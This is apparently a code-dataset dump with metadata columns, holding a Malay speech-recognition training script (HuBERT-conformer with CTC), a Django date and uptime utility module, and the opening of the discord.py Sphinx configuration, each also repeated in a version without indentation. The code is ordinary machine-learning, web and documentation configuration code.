    if choice == 5:
        x = random_amplitude_threshold(
            signal, threshold=random.uniform(0.35, 0.8)
        )
    if choice == 6:
        x = augmentation.lowpass_filter(
            signal, sr=sr, cutoff=random.randint(200, 551)
        )
    if choice == 7:
        x = augmentation.highpass_filter(
            signal, sr=sr, cutoff=random.randint(551, 1653)
        )
    if choice == 8:
        x = augmentation.bandpass_filter(
            signal,
            sr=sr,
            cutoff_low=random.randint(200, 551),
            cutoff_high=random.randint(551, 1653),
        )
    if choice == 9:
        x = augment_room(signal)
    if choice == 10:
        x = signal
    # Skip extra boosting when branch 5 already applied amplitude thresholding.
    if choice not in [5] and random.gauss(0.5, 0.14) > 0.6:
        x = random_amplitude_threshold(
            x, low=1.0, high=2.0, threshold=random.uniform(0.6, 0.9)
        )
    if random.gauss(0.5, 0.14) > 0.6 and add_uniform:
        x = add_uniform_noise(x, power=random.uniform(0.005, 0.015))
    return x
def mp3_to_wav(file, sr=sr):
    """Decode an audio file to a mono float waveform at sample rate ``sr``.

    Returns a tuple of (float waveform, sample rate).
    """
    segment = AudioSegment.from_file(file).set_frame_rate(sr).set_channels(1)
    raw = np.array(segment.get_array_of_samples())
    return malaya_speech.astype.int_to_float(raw), sr
def generate(file):
    """Yield ASR training examples from a JSON manifest, forever.

    ``file`` is a JSON object mapping 'X' (audio paths) to 'Y'
    (transcripts).  Each pass over the data reshuffles the pairs.
    Examples are skipped when the transcript is shorter than
    ``minlen_text`` or the audio exceeds ``maxlen`` seconds.  Yields
    dicts with the waveform, its length, integer character targets and
    their length.  Per-example decode errors are printed and skipped so
    the generator keeps running.
    """
    with open(file) as fopen:
        dataset = json.load(fopen)
    audios, cleaned_texts = dataset['X'], dataset['Y']
    while True:
        audios, cleaned_texts = shuffle(audios, cleaned_texts)
        for i in range(len(audios)):
            try:
                if audios[i].endswith('.mp3'):
                    # print('found mp3', audios[i])
                    wav_data, _ = mp3_to_wav(audios[i])
                else:
                    wav_data, _ = malaya_speech.load(audios[i], sr=sr)
                if len(cleaned_texts[i]) < minlen_text:
                    # print(f'skipped text too short {audios[i]}')
                    continue
                if (len(wav_data) / sr) > maxlen:
                    continue
                # Encode each transcript character as its vocab index.
                t = [unique_vocab.index(c) for c in cleaned_texts[i]]
                yield {
                    'waveforms': wav_data,
                    'waveforms_length': [len(wav_data)],
                    'targets': t,
                    'targets_length': [len(t)],
                }
            except Exception as e:
                print(e)
def get_dataset(
    file,
    batch_size=12,
    shuffle_size=20,
    thread_count=24,
    maxlen_feature=1800,
):
    """Build a tf.data input_fn over the JSON manifest ``file``.

    Returns a zero-argument callable (the shape the Estimator API
    expects) that produces prefetched, zero-padded batches of
    ``batch_size`` examples from ``generate``.

    NOTE(review): ``shuffle_size``, ``thread_count`` and
    ``maxlen_feature`` are accepted but unused here — shuffling happens
    inside ``generate``; confirm they were meant to be wired up.
    """
    def get():
        # Wrap the Python generator; all features are rank-1 tensors.
        dataset = tf.data.Dataset.from_generator(
            generate,
            {
                'waveforms': tf.float32,
                'waveforms_length': tf.int32,
                'targets': tf.int32,
                'targets_length': tf.int32,
            },
            output_shapes={
                'waveforms': tf.TensorShape([None]),
                'waveforms_length': tf.TensorShape([None]),
                'targets': tf.TensorShape([None]),
                'targets_length': tf.TensorShape([None]),
            },
            args=(file,),
        )
        dataset = dataset.prefetch(tf.contrib.data.AUTOTUNE)
        # Zero-pad every feature to the longest element in the batch.
        dataset = dataset.padded_batch(
            batch_size,
            padded_shapes={
                'waveforms': tf.TensorShape([None]),
                'waveforms_length': tf.TensorShape([None]),
                'targets': tf.TensorShape([None]),
                'targets_length': tf.TensorShape([None]),
            },
            padding_values={
                'waveforms': tf.constant(0, dtype=tf.float32),
                'waveforms_length': tf.constant(0, dtype=tf.int32),
                'targets': tf.constant(0, dtype=tf.int32),
                'targets_length': tf.constant(0, dtype=tf.int32),
            },
        )
        return dataset

    return get
class Encoder:
    """Adapter exposing a ConformerModel under the callable interface
    expected by the HuBERT model's encoder slot."""
    def __init__(self, config):
        # config: keyword arguments forwarded verbatim to ConformerModel.
        self.config = config
        self.encoder = ConformerModel(**self.config)
    def __call__(self, x, input_mask, training=True):
        # NOTE(review): input_mask is accepted for interface
        # compatibility but ignored here — confirm padding is handled
        # elsewhere in the pipeline.
        return self.encoder(x, training=training)
# Total optimizer steps; drives the LR schedule and run_training's max_steps.
total_steps = 2000000
def model_fn(features, labels, mode, params):
    """Estimator model_fn: HuBERT-conformer encoder with a CTC head.

    Builds the model, computes CTC loss/accuracy over character targets,
    warm-starts weights from a pretrained HuBERT checkpoint, and returns
    an EstimatorSpec for TRAIN or EVAL.  ``labels`` and ``params`` are
    part of the Estimator signature but unused here.
    """
    # Conformer-tiny encoder without internal subsampling and with
    # dropout disabled for fine-tuning.
    config_conformer = malaya_speech.config.conformer_tiny_encoder_config
    config_conformer['subsampling']['type'] = 'none'
    config_conformer['dropout'] = 0.0
    encoder = Encoder(config_conformer)
    cfg = hubert.HuBERTConfig(
        extractor_mode='layer_norm',
        dropout=0.0,
        attention_dropout=0.0,
        encoder_layerdrop=0.0,
        dropout_input=0.0,
        dropout_features=0.0,
        final_dim=128,
    )
    # The third argument is the pretraining label dictionary
    # (special tokens + 100 cluster ids); unused for feature extraction.
    model = hubert.Model(cfg, encoder, ['pad', 'eos', 'unk'] + [str(i) for i in range(100)])
    X = features['waveforms']
    X_len = features['waveforms_length'][:, 0]
    targets = features['targets']
    targets_int32 = tf.cast(targets, tf.int32)
    targets_length = features['targets_length'][:, 0]
    # Run the encoder only (no masking / quantization heads).
    r = model(X, padding_mask=X_len, features_only=True, mask=False)
    # CTC projection: vocab plus one blank symbol.
    logits = tf.layers.dense(r['x'], len(unique_vocab) + 1)
    # Valid (non-padded) frame count per example.
    seq_lens = tf.reduce_sum(
        tf.cast(tf.logical_not(r['padding_mask']), tf.int32), axis=1
    )
    mean_error, sum_error, sum_weight = ctc.loss.ctc_loss(
        logits, seq_lens, targets_int32, targets_length
    )
    loss = mean_error
    accuracy = ctc.metrics.ctc_sequence_accuracy(
        logits, seq_lens, targets_int32, targets_length,
    )
    # Named tensors so LoggingTensorHook can find them.
    tf.identity(loss, 'train_loss')
    tf.identity(accuracy, name='train_accuracy')
    tf.summary.scalar('train_accuracy', accuracy)
    # Warm-start every matching trainable variable from the pretrained
    # HuBERT checkpoint.
    variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
    init_checkpoint = 'hubert-conformer-tiny/model.ckpt-1000000'
    assignment_map, initialized_variable_names = train.get_assignment_map_from_checkpoint(
        variables, init_checkpoint
    )
    tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
    if mode == tf.estimator.ModeKeys.TRAIN:
        # AdamW with linear warmup and decay to zero over total_steps.
        train_op = train.optimizer.adamw.create_optimizer(
            loss,
            init_lr=5e-5,
            num_train_steps=total_steps,
            num_warmup_steps=100000,
            end_learning_rate=0.0,
            weight_decay_rate=0.01,
            beta_1=0.9,
            beta_2=0.999,
            epsilon=1e-6,
            clip_norm=1.0,
        )
        estimator_spec = tf.estimator.EstimatorSpec(
            mode=mode, loss=loss, train_op=train_op
        )
    elif mode == tf.estimator.ModeKeys.EVAL:
        estimator_spec = tf.estimator.EstimatorSpec(
            mode=tf.estimator.ModeKeys.EVAL,
            loss=loss,
            eval_metric_ops={
                'accuracy': ctc.metrics.ctc_sequence_accuracy_estimator(
                    logits, seq_lens, targets_int32, targets_length
                )
            },
        )
    return estimator_spec
# Log the named loss/accuracy tensors every step during training.
train_hooks = [
    tf.train.LoggingTensorHook(
        ['train_accuracy', 'train_loss'], every_n_iter=1
    )
]
# input_fn factories over the train/dev manifests.
train_dataset = get_dataset('bahasa-asr-train-combined.json')
dev_dataset = get_dataset('bahasa-asr-test.json')
# Launch Estimator training with periodic checkpointing and evaluation.
train.run_training(
    train_fn=train_dataset,
    model_fn=model_fn,
    model_dir='hubert-conformer-tiny-ctc-char',
    num_gpus=1,
    log_step=1,
    save_checkpoint_step=20000,
    max_steps=total_steps,
    eval_fn=dev_dataset,
    train_hooks=train_hooks,
)
| 30.639437 | 92 | 0.590144 | import os
os.environ['CUDA_VISIBLE_DEVICES'] = '3'
import pyroomacoustics as pra
import numpy as np
from pydub import AudioSegment
from sklearn.utils import shuffle
from glob import glob
import random
import json
from malaya_speech.train.model.conformer.model import Model as ConformerModel
from malaya_speech.train.model import hubert, ctc
import malaya_speech.train as train
import malaya_speech.config
import malaya_speech.augmentation.waveform as augmentation
import malaya_speech
import tensorflow as tf
import os
import string
sr = 16000
maxlen = 18
minlen_text = 1
prob_aug = 0.95
unique_vocab = [''] + list(string.ascii_lowercase + string.digits) + [' ']
def augment_room(y, scale=1.0):
corners = np.array(
[[0, 0], [0, 5 * scale], [3 * scale, 5 * scale], [3 * scale, 0]]
).T
room = pra.Room.from_corners(
corners,
fs=sr,
materials=pra.Material(0.2, 0.15),
ray_tracing=True,
air_absorption=True,
)
room.extrude(3.5, materials=pra.Material(0.2, 0.15))
room.set_ray_tracing(
receiver_radius=0.5, n_rays=1000, energy_thres=1e-5
)
room.add_source([1.5 * scale, 4 * scale, 0.5], signal=y)
R = np.array([[1.5 * scale], [0.5 * scale], [0.5]])
room.add_microphone(R)
room.simulate()
return room.mic_array.signals[0]
def random_amplitude_threshold(sample, low=1, high=2, threshold=0.4):
y_aug = sample.copy()
dyn_change = np.random.uniform(low=low, high=high)
y_aug[np.abs(y_aug) >= threshold] = (
y_aug[np.abs(y_aug) >= threshold] * dyn_change
)
return np.clip(y_aug, -1, 1)
def add_uniform_noise(
sample, power=0.01, return_noise=False, scale=False
):
y_noise = sample.copy()
noise_amp = power * np.random.uniform() * np.amax(y_noise)
noise = noise_amp * np.random.normal(size=y_noise.shape[0])
y_noise = y_noise + noise
if scale:
y_noise = y_noise / (np.max(np.abs(y_noise)) + 1e-9)
if return_noise:
if scale:
noise = noise / (np.max(np.abs(y_noise)) + 1e-9)
return y_noise, noise
else:
return y_noise
def calc(signal, add_uniform=True):
choice = random.randint(0, 10)
print('choice', choice)
if choice == 0:
x = augmentation.sox_augment_high(
signal,
min_bass_gain=random.randint(25, 50),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 50),
negate=1,
)
if choice == 1:
x = augmentation.sox_augment_high(
signal,
min_bass_gain=random.randint(25, 70),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 50),
negate=0,
)
if choice == 2:
x = augmentation.sox_augment_low(
signal,
min_bass_gain=random.randint(5, 30),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 50),
negate=random.randint(0, 1),
)
if choice == 3:
x = augmentation.sox_augment_combine(
signal,
min_bass_gain_high=random.randint(25, 70),
min_bass_gain_low=random.randint(5, 30),
reverberance=random.randint(0, 80),
hf_damping=10,
room_scale=random.randint(0, 90),
)
if choice == 4:
x = augmentation.sox_reverb(
signal,
reverberance=random.randint(10, 80),
hf_damping=10,
room_scale=random.randint(10, 90),
)
if choice == 5:
x = random_amplitude_threshold(
signal, threshold=random.uniform(0.35, 0.8)
)
if choice == 6:
x = augmentation.lowpass_filter(
signal, sr=sr, cutoff=random.randint(200, 551)
)
if choice == 7:
x = augmentation.highpass_filter(
signal, sr=sr, cutoff=random.randint(551, 1653)
)
if choice == 8:
x = augmentation.bandpass_filter(
signal,
sr=sr,
cutoff_low=random.randint(200, 551),
cutoff_high=random.randint(551, 1653),
)
if choice == 9:
x = augment_room(signal)
if choice == 10:
x = signal
if choice not in [5] and random.gauss(0.5, 0.14) > 0.6:
x = random_amplitude_threshold(
x, low=1.0, high=2.0, threshold=random.uniform(0.6, 0.9)
)
if random.gauss(0.5, 0.14) > 0.6 and add_uniform:
x = add_uniform_noise(x, power=random.uniform(0.005, 0.015))
return x
def mp3_to_wav(file, sr=sr):
audio = AudioSegment.from_file(file)
audio = audio.set_frame_rate(sr).set_channels(1)
sample = np.array(audio.get_array_of_samples())
return malaya_speech.astype.int_to_float(sample), sr
def generate(file):
with open(file) as fopen:
dataset = json.load(fopen)
audios, cleaned_texts = dataset['X'], dataset['Y']
while True:
audios, cleaned_texts = shuffle(audios, cleaned_texts)
for i in range(len(audios)):
try:
if audios[i].endswith('.mp3'):
wav_data, _ = mp3_to_wav(audios[i])
else:
wav_data, _ = malaya_speech.load(audios[i], sr=sr)
if len(cleaned_texts[i]) < minlen_text:
continue
if (len(wav_data) / sr) > maxlen:
continue
t = [unique_vocab.index(c) for c in cleaned_texts[i]]
yield {
'waveforms': wav_data,
'waveforms_length': [len(wav_data)],
'targets': t,
'targets_length': [len(t)],
}
except Exception as e:
print(e)
def get_dataset(
file,
batch_size=12,
shuffle_size=20,
thread_count=24,
maxlen_feature=1800,
):
def get():
dataset = tf.data.Dataset.from_generator(
generate,
{
'waveforms': tf.float32,
'waveforms_length': tf.int32,
'targets': tf.int32,
'targets_length': tf.int32,
},
output_shapes={
'waveforms': tf.TensorShape([None]),
'waveforms_length': tf.TensorShape([None]),
'targets': tf.TensorShape([None]),
'targets_length': tf.TensorShape([None]),
},
args=(file,),
)
dataset = dataset.prefetch(tf.contrib.data.AUTOTUNE)
dataset = dataset.padded_batch(
batch_size,
padded_shapes={
'waveforms': tf.TensorShape([None]),
'waveforms_length': tf.TensorShape([None]),
'targets': tf.TensorShape([None]),
'targets_length': tf.TensorShape([None]),
},
padding_values={
'waveforms': tf.constant(0, dtype=tf.float32),
'waveforms_length': tf.constant(0, dtype=tf.int32),
'targets': tf.constant(0, dtype=tf.int32),
'targets_length': tf.constant(0, dtype=tf.int32),
},
)
return dataset
return get
class Encoder:
def __init__(self, config):
self.config = config
self.encoder = ConformerModel(**self.config)
def __call__(self, x, input_mask, training=True):
return self.encoder(x, training=training)
total_steps = 2000000
def model_fn(features, labels, mode, params):
config_conformer = malaya_speech.config.conformer_tiny_encoder_config
config_conformer['subsampling']['type'] = 'none'
config_conformer['dropout'] = 0.0
encoder = Encoder(config_conformer)
cfg = hubert.HuBERTConfig(
extractor_mode='layer_norm',
dropout=0.0,
attention_dropout=0.0,
encoder_layerdrop=0.0,
dropout_input=0.0,
dropout_features=0.0,
final_dim=128,
)
model = hubert.Model(cfg, encoder, ['pad', 'eos', 'unk'] + [str(i) for i in range(100)])
X = features['waveforms']
X_len = features['waveforms_length'][:, 0]
targets = features['targets']
targets_int32 = tf.cast(targets, tf.int32)
targets_length = features['targets_length'][:, 0]
r = model(X, padding_mask=X_len, features_only=True, mask=False)
logits = tf.layers.dense(r['x'], len(unique_vocab) + 1)
seq_lens = tf.reduce_sum(
tf.cast(tf.logical_not(r['padding_mask']), tf.int32), axis=1
)
mean_error, sum_error, sum_weight = ctc.loss.ctc_loss(
logits, seq_lens, targets_int32, targets_length
)
loss = mean_error
accuracy = ctc.metrics.ctc_sequence_accuracy(
logits, seq_lens, targets_int32, targets_length,
)
tf.identity(loss, 'train_loss')
tf.identity(accuracy, name='train_accuracy')
tf.summary.scalar('train_accuracy', accuracy)
variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
init_checkpoint = 'hubert-conformer-tiny/model.ckpt-1000000'
assignment_map, initialized_variable_names = train.get_assignment_map_from_checkpoint(
variables, init_checkpoint
)
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = train.optimizer.adamw.create_optimizer(
loss,
init_lr=5e-5,
num_train_steps=total_steps,
num_warmup_steps=100000,
end_learning_rate=0.0,
weight_decay_rate=0.01,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-6,
clip_norm=1.0,
)
estimator_spec = tf.estimator.EstimatorSpec(
mode=mode, loss=loss, train_op=train_op
)
elif mode == tf.estimator.ModeKeys.EVAL:
estimator_spec = tf.estimator.EstimatorSpec(
mode=tf.estimator.ModeKeys.EVAL,
loss=loss,
eval_metric_ops={
'accuracy': ctc.metrics.ctc_sequence_accuracy_estimator(
logits, seq_lens, targets_int32, targets_length
)
},
)
return estimator_spec
train_hooks = [
tf.train.LoggingTensorHook(
['train_accuracy', 'train_loss'], every_n_iter=1
)
]
train_dataset = get_dataset('bahasa-asr-train-combined.json')
dev_dataset = get_dataset('bahasa-asr-test.json')
train.run_training(
train_fn=train_dataset,
model_fn=model_fn,
model_dir='hubert-conformer-tiny-ctc-char',
num_gpus=1,
log_step=1,
save_checkpoint_step=20000,
max_steps=total_steps,
eval_fn=dev_dataset,
train_hooks=train_hooks,
)
| true | true |
f7193bb525a1bcd7a4c3765147b5f3469bdd3591 | 1,555 | py | Python | etools/apps/uptime/utils.py | Igelinmist/etools | 26ae66a2ad005a7a173253bc9822a770a3115645 | [
"BSD-3-Clause"
] | null | null | null | etools/apps/uptime/utils.py | Igelinmist/etools | 26ae66a2ad005a7a173253bc9822a770a3115645 | [
"BSD-3-Clause"
] | null | null | null | etools/apps/uptime/utils.py | Igelinmist/etools | 26ae66a2ad005a7a173253bc9822a770a3115645 | [
"BSD-3-Clause"
] | null | null | null | from datetime import timedelta, date
def req_date(local_date):
    """Normalize a local 'DD.MM.YYYY' string or a date to ISO 'YYYY-MM-DD'.

    Any other value is returned unchanged.
    """
    if isinstance(local_date, date):
        return local_date.strftime('%Y-%m-%d')
    if isinstance(local_date, str):
        day, month, year = local_date.split('.')
        return '-'.join((year, month, day))
    return local_date
def req_timedelta(arg):
    """Coerce *arg* to a timedelta.

    Accepts a timedelta (returned as-is) or an 'H:MM' string; any
    malformed string or other type yields ``timedelta(0)``.
    """
    if isinstance(arg, timedelta):
        return arg
    if isinstance(arg, str):
        parts = arg.split(':')
        try:
            # ValueError: non-numeric parts; IndexError: no ':' in the
            # string (previously crashed instead of falling back to 0).
            return timedelta(hours=int(parts[0]), minutes=int(parts[1]))
        except (ValueError, IndexError):
            return timedelta(0)
    return timedelta(0)
def yesterday_local():
    """Return yesterday's date formatted as 'DD.MM.YYYY'."""
    yesterday = date.today() - timedelta(days=1)
    return yesterday.strftime("%d.%m.%Y")
def stat_timedelta_for_report(time_delta, round_to_hour=True):
    """Format a timedelta for uptime reports.

    With ``round_to_hour`` the result is whole hours as a plain string
    (a remainder of 30 minutes or more rounds up); otherwise 'H:MM',
    using a space as the thousands separator in the hour part.  A falsy
    ``time_delta`` renders as '-'.
    """
    if not time_delta:
        return '-'
    total_seconds = time_delta.total_seconds()
    hours, leftover = divmod(total_seconds, 3600)
    if round_to_hour:
        rounded = int(hours) + (1 if leftover >= 1800 else 0)
        return str(rounded)
    minutes = int(leftover // 60)
    hour_part = "{0:,d}".format(int(hours)).replace(',', ' ')
    return "{0}:{1:02}".format(hour_part, minutes)
def custom_redirect(url_name, *args, **kwargs):
    """Redirect to a named URL, appending ``kwargs`` as a query string.

    ``args`` are positional arguments for URL reversal; ``kwargs``
    become urlencoded GET parameters.  Note the query string is appended
    even when ``kwargs`` is empty (trailing '?').

    NOTE(review): ``django.core.urlresolvers`` was removed in Django 2.0
    (use ``django.urls.reverse``) — this code targets Django < 2.0.
    """
    from django.core.urlresolvers import reverse
    from django.http import HttpResponseRedirect
    from django.utils.http import urlencode
    url = reverse(url_name, args=args)
    params = urlencode(kwargs)
    return HttpResponseRedirect(url + "?%s" % params)
| 28.796296 | 80 | 0.595498 | from datetime import timedelta, date
def req_date(local_date):
if isinstance(local_date, str):
d, m, y = local_date.split('.')
return '{0}-{1}-{2}'.format(y, m, d)
elif isinstance(local_date, date):
return local_date.strftime('%Y-%m-%d')
else:
return local_date
def req_timedelta(arg):
if isinstance(arg, timedelta):
return arg
else:
if isinstance(arg, str):
parts = arg.split(':')
try:
res = timedelta(hours=int(parts[0]), minutes=int(parts[1]))
except ValueError:
res = timedelta(0)
return res
else:
return timedelta(0)
def yesterday_local():
return (date.today() - timedelta(days=1)).strftime("%d.%m.%Y")
def stat_timedelta_for_report(time_delta, round_to_hour=True):
if time_delta:
sec = time_delta.total_seconds()
hours, remainder = divmod(sec, 3600)
if round_to_hour:
if remainder >= 1800:
hours += 1
return str(int(hours))
minutes, remainder = divmod(remainder, 60)
return "{0:,d}:{1:02}".format(int(hours), int(minutes)).replace(',',' ')
else:
return '-'
def custom_redirect(url_name, *args, **kwargs):
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.utils.http import urlencode
url = reverse(url_name, args=args)
params = urlencode(kwargs)
return HttpResponseRedirect(url + "?%s" % params)
| true | true |
f7193dc596182608b60c2744dd8a96f97d37ed2c | 11,229 | py | Python | docs/conf.py | jeromedontdev/discord.py | 42bab370a73440fa8af2380211ad92ccb6bf7f46 | [
"MIT"
] | 13 | 2020-12-16T06:13:11.000Z | 2021-04-15T12:01:38.000Z | docs/conf.py | RootGC/discord.py | 8bc489dba8b8c7ca9141e4e7f00a0e916a7c0269 | [
"MIT"
] | 1 | 2021-05-23T16:08:10.000Z | 2021-05-23T16:08:10.000Z | docs/conf.py | RootGC/discord.py | 8bc489dba8b8c7ca9141e4e7f00a0e916a7c0269 | [
"MIT"
] | 6 | 2020-12-16T00:01:24.000Z | 2021-02-05T12:32:54.000Z | #
# discord.py documentation build configuration file, created by
# sphinx-quickstart on Fri Aug 21 05:43:30 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import re
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.append(os.path.abspath('extensions'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'builder',
'sphinx.ext.autodoc',
'sphinx.ext.extlinks',
'sphinx.ext.intersphinx',
'sphinx.ext.napoleon',
'sphinxcontrib_trio',
'details',
'exception_hierarchy',
'attributetable',
'resourcelinks',
'nitpick_file_ignorer',
]
autodoc_member_order = 'bysource'
autodoc_typehints = 'none'
extlinks = {
'issue': ('https://github.com/Rapptz/discord.py/issues/%s', 'GH-'),
}
# Links used for cross-referencing stuff in other documentation
intersphinx_mapping = {
'py': ('https://docs.python.org/3', None),
'aio': ('https://docs.aiohttp.org/en/stable/', None),
'req': ('https://docs.python-requests.org/en/latest/', None)
}
rst_prolog = """
.. |coro| replace:: This function is a |coroutine_link|_.
.. |maybecoro| replace:: This function *could be a* |coroutine_link|_.
.. |coroutine_link| replace:: *coroutine*
.. _coroutine_link: https://docs.python.org/3/library/asyncio-task.html#coroutine
"""
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'discord.py'
copyright = '2015-present, Rapptz'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ''
with open('../discord/__init__.py') as f:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)
# The full version, including alpha/beta/rc tags.
release = version
# This assumes a tag is available for final releases
branch = 'master' if version.endswith('a') else 'v' + version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
locale_dirs = ['locale/']
gettext_compact = False
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'friendly'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# Nitpicky mode options
nitpick_ignore_files = [
"migrating_to_async",
"migrating",
"whats_new",
]
# -- Options for HTML output ----------------------------------------------
html_experimental_html5_writer = True
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'basic'
html_context = {
'discord_invite': 'https://discord.gg/r3sSKJJ',
'discord_extensions': [
('discord.ext.commands', 'ext/commands'),
('discord.ext.tasks', 'ext/tasks'),
],
}
resource_links = {
'discord': 'https://discord.gg/r3sSKJJ',
'issues': 'https://github.com/Rapptz/discord.py/issues',
'discussions': 'https://github.com/Rapptz/discord.py/discussions',
'examples': f'https://github.com/Rapptz/discord.py/tree/{branch}/examples',
}
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {
# }
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = './images/discord_py_logo.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
html_search_scorer = '_static/scorer.js'
html_js_files = [
'custom.js',
'settings.js',
'copy.js',
'sidebar.js'
]
# Output file base name for HTML help builder.
htmlhelp_basename = 'discord.pydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'discord.py.tex', 'discord.py Documentation',
'Rapptz', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'discord.py', 'discord.py Documentation',
['Rapptz'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'discord.py', 'discord.py Documentation',
'Rapptz', 'discord.py', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
def setup(app):
    # Sphinx extension entry point: when building the Japanese locale,
    # point intersphinx at the Japanese Python docs and swap the Discord
    # invite links for the Japanese community server.
    if app.config.language == 'ja':
        app.config.intersphinx_mapping['py'] = ('https://docs.python.org/ja/3', None)
        app.config.html_context['discord_invite'] = 'https://discord.gg/nXzj3dg'
        app.config.resource_links['discord'] = 'https://discord.gg/nXzj3dg'
| 31.191667 | 99 | 0.708612 |
import sys
import os
import re
sys.path.insert(0, os.path.abspath('..'))
sys.path.append(os.path.abspath('extensions'))
extensions = [
'builder',
'sphinx.ext.autodoc',
'sphinx.ext.extlinks',
